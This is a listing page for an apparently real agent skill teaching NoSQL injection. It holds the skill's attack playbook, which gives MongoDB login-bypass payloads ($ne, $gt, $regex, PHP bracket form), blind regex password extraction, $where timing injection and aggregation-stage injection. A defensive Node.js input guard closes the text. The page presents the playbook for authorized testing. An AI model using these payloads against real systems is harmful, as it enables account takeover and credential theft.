
Nosql Injection
Run structured NoSQL injection tests on MongoDB-style APIs and query DSLs when SQLi checklists miss operator-based auth bypass and data abuse.
Overview
NoSQL Injection is an agent skill for the Ship phase that provides an expert attack playbook for MongoDB operator injection, auth bypass, and related NoSQL logic abuse on JSON and DSL-backed APIs.
Install
npx skills add https://github.com/yaklang/hack-skills --skill nosql-injection
What is this skill?
- Contrasts SQL string breakout vs MongoDB operator injection ($gt, $ne, $regex)
- Login bypass payloads for JSON bodies and PHP-style array parameter injection
- Blind extraction, aggregation pipeline injection, and Redis/CouchDB-specific angles
- Expert playbook framing—commonly missed by SQL-only testers
- Structured attack vectors for flexible search filters and backend query DSLs
Adoption & trust: 1k installs on skills.sh; 980 GitHub stars; 2/3 security scanners passed (skills.sh audits).
What problem does it solve?
Your API uses document databases or JSON filters and you only test SQL patterns, so operator injection and login bypass risks stay invisible until abuse hits production.
Who is it for?
Indie backend devs self-pentesting MongoDB/JSON login and search routes before ship or during a focused security pass.
Skip if: you lack legal authorization to test the third-party system in question, or the app has zero NoSQL/JSON query surfaces; use generic OWASP guides for SQL-only stacks.
When should I use this skill?
MongoDB-style operators, JSON query objects, flexible search filters, or backend query DSLs may allow data or logic abuse.
What do I get? / Deliverables
You get prioritized NoSQL injection test cases and bypass patterns to run against staging endpoints, informing fixes before release or bounty submission.
- Operator injection test matrix
- Documented bypass attempts and findings
- Remediation hints tied to query shape
Journey fit
Offensive security validation belongs in Ship → Security before production exposure of flexible JSON/query backends. Security subphase covers deliberate abuse testing of authentication and data APIs, not feature implementation.
How it compares
Operator-focused NoSQL playbook—not a SQL injection cheat sheet or automated DAST replacement.
Common Questions / FAQ
Who is nosql-injection for?
Builders and security-minded solo devs maintaining APIs backed by MongoDB-style stores or JSON query DSLs who need structured offensive test ideas.
When should I use nosql-injection?
Use in Ship → Security while hardening auth and search endpoints; also relevant in Operate → iterate after an incident suspicion on document-query APIs.
Is nosql-injection safe to install?
The skill describes attack techniques—use only on systems you own or are authorized to test; confirm source trust via the Security Audits panel on this page.
SKILL.md
# SKILL: NoSQL Injection — Expert Attack Playbook

> **AI LOAD INSTRUCTION**: NoSQL injection is fundamentally different from SQL injection. Covers MongoDB operator injection, authentication bypass, blind extraction, aggregation pipeline injection, and Redis/CouchDB specific attacks. Very commonly missed by testers who only know SQLi patterns.

---

## 1. CORE CONCEPT — OPERATOR INJECTION

**SQL Injection** breaks out of string literals. **NoSQL Injection** injects **query operators** that change query logic.

MongoDB example — normal query:

```javascript
db.users.find({username: "alice", password: "secret"})
```

Injection via JSON operator:

```json
{
  "username": "admin",
  "password": {"$gt": ""}
}
```

→ Becomes: `find({username:"admin", password:{$gt:""}})`
→ `password > ""` → true for any non-empty password, so the check always passes!

---

## 2. MONGODB — LOGIN BYPASS

### JSON Body Injection (API with JSON Content-Type)

```http
POST /api/login
Content-Type: application/json

{"username": "admin", "password": {"$ne": "invalid"}}
{"username": "admin", "password": {"$gt": ""}}
{"username": {"$ne": "invalid"}, "password": {"$ne": "invalid"}}
{"username": "admin", "password": {"$regex": ".*"}}
```

### PHP `$_POST` Array Injection (URL-encoded form)

```
username=admin&password[$ne]=invalid
username=admin&password[$gt]=
username[$ne]=invalid&password[$ne]=invalid
username=admin&password[$regex]=.*
```

### Ruby / Python `params` Array Injection

Same as PHP — use bracket notation to inject objects:

```
?username[%24ne]=invalid&password[%24ne]=invalid
```

`%24` = URL-encoded `$`

---

## 3. MONGODB OPERATORS FOR INJECTION

| Operator | Meaning | Use Case |
|---|---|---|
| `$ne` | not equal | `{"password": {"$ne": "x"}}` → always matches |
| `$gt` | greater than | `{"password": {"$gt": ""}}` → all non-empty passwords match |
| `$gte` | greater or equal | Similar to `$gt` |
| `$lt` | less than | `{"password": {"$lt": "~"}}` → all ASCII match |
| `$regex` | regex match | `{"username": {"$regex": "adm.*"}}` |
| `$where` | JS expression | MOST DANGEROUS — code execution |
| `$exists` | field exists | `{"admin": {"$exists": true}}` |
| `$in` | in array | `{"username": {"$in": ["admin","user"]}}` |

---

## 4. BLIND DATA EXTRACTION VIA $REGEX

Like binary search in SQLi, use `$regex` to extract field values character by character:

```jsonc
// Does admin's password start with 'a'?
{"username": "admin", "password": {"$regex": "^a"}}

// Does admin's password start with 'b'?
{"username": "admin", "password": {"$regex": "^b"}}

// Continue: narrow down each position
{"username": "admin", "password": {"$regex": "^ab"}}
{"username": "admin", "password": {"$regex": "^ac"}}
```

**Response difference**: successful login vs failed login = boolean oracle.

**Automate** with NoSQLMap or a custom script with binary search on the character set.

---

## 5. MONGODB $WHERE INJECTION (JS EXECUTION)

`$where` evaluates JavaScript in MongoDB context. **Can only use current document's fields** — not system access. But allows logic abuse:

```jsonc
{"$where": "this.username == 'admin' && this.password.length > 0"}

// Blind extraction via timing:
{"$where": "if(this.username=='admin'){sleep(5000);return true;}else{return false;}"}

// Regex via JS:
{"$where": "this.username.match(/^adm/) && true"}
```

**Limit**: `$where` doesn't give OS command execution — it is **server-side JS injection** (not to be confused with command injection).

---

## 6. AGGREGATION PIPELINE INJECTION

When user-controlled data enters `$match` or `$group` stages:

```javascript
// Vulnerable code:
db.collection.aggregate([
  {$match: {category: userInput}}, // userInput = {"$ne": null}
  ...
])
```

Inject operators to bypass:

```
// Input as object:
{"$ne": null}   → matches all categories
{"$regex": ".*"} → matches all
```

---
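A request-side guard for the login (sections 1 and 2) and aggregation (section 6) cases above, added here as a defender's example; it is not code from the hack-skills playbook. It assumes a Node.js handler that receives either a parsed JSON body or a raw URL-encoded form, and `findOperatorKeys`, `decodeForm`, `requireString`, `buildLoginFilter` and `buildCategoryMatch` are hypothetical names.

```javascript
// Added example, not from the hack-skills playbook; assumes a Node.js handler.
// Recursively collect the path of every key beginning with "$": a MongoDB
// operator arriving inside user-supplied data.
function findOperatorKeys(value, path = "") {
  if (Array.isArray(value)) return value.flatMap((v, i) => findOperatorKeys(v, `${path}[${i}]`));
  if (value === null || typeof value !== "object") return [];
  return Object.entries(value).flatMap(([k, v]) => {
    const here = path ? `${path}.${k}` : k;
    return (k.startsWith("$") ? [here] : []).concat(findOperatorKeys(v, here));
  });
}

// Decode the bracket form the playbook shows (password[$ne]=x) the way PHP or
// the qs module would, so a URL-encoded body is inspected exactly like JSON.
// One bracket level is handled, which is all the shown payloads need.
function decodeForm(body) {
  const out = {};
  for (const pair of body.replace(/^\?/, "").split("&")) {
    const eq = pair.indexOf("=");
    const key = decodeURIComponent(eq < 0 ? pair : pair.slice(0, eq));
    const val = decodeURIComponent((eq < 0 ? "" : pair.slice(eq + 1)).replace(/\+/g, " "));
    const m = key.match(/^([^[]+)\[([^\]]*)\]$/);
    if (!m) { out[key] = val; continue; }
    if (typeof out[m[1]] !== "object" || out[m[1]] === null) out[m[1]] = {};
    out[m[1]][m[2]] = val;
  }
  return out;
}

// A field that must be a scalar accepts only a plain string; an object here
// is exactly how {"$gt": ""} reaches find().
function requireString(name, v) {
  if (typeof v !== "string") throw new Error(`${name} must be a string`);
  return v;
}

// Hardened login filter: reject any operator key outright (so the attempt is
// visible in logs) and pin both fields to strings under $eq, which compares
// the value literally instead of interpreting it as an operator document.
function buildLoginFilter(body) {
  const ops = findOperatorKeys(body);
  if (ops.length) throw new Error(`operator keys rejected: ${ops.join(", ")}`);
  return {
    username: { $eq: requireString("username", body.username) },
    password: { $eq: requireString("password", body.password) },
  };
}

// Hardened $match stage for the aggregation case in section 6.
function buildCategoryMatch(userInput) {
  return { $match: { category: { $eq: requireString("category", userInput) } } };
}
```

Run `decodeForm` on form bodies before `buildLoginFilter` so the PHP-style bracket payloads are caught by the same check as JSON ones.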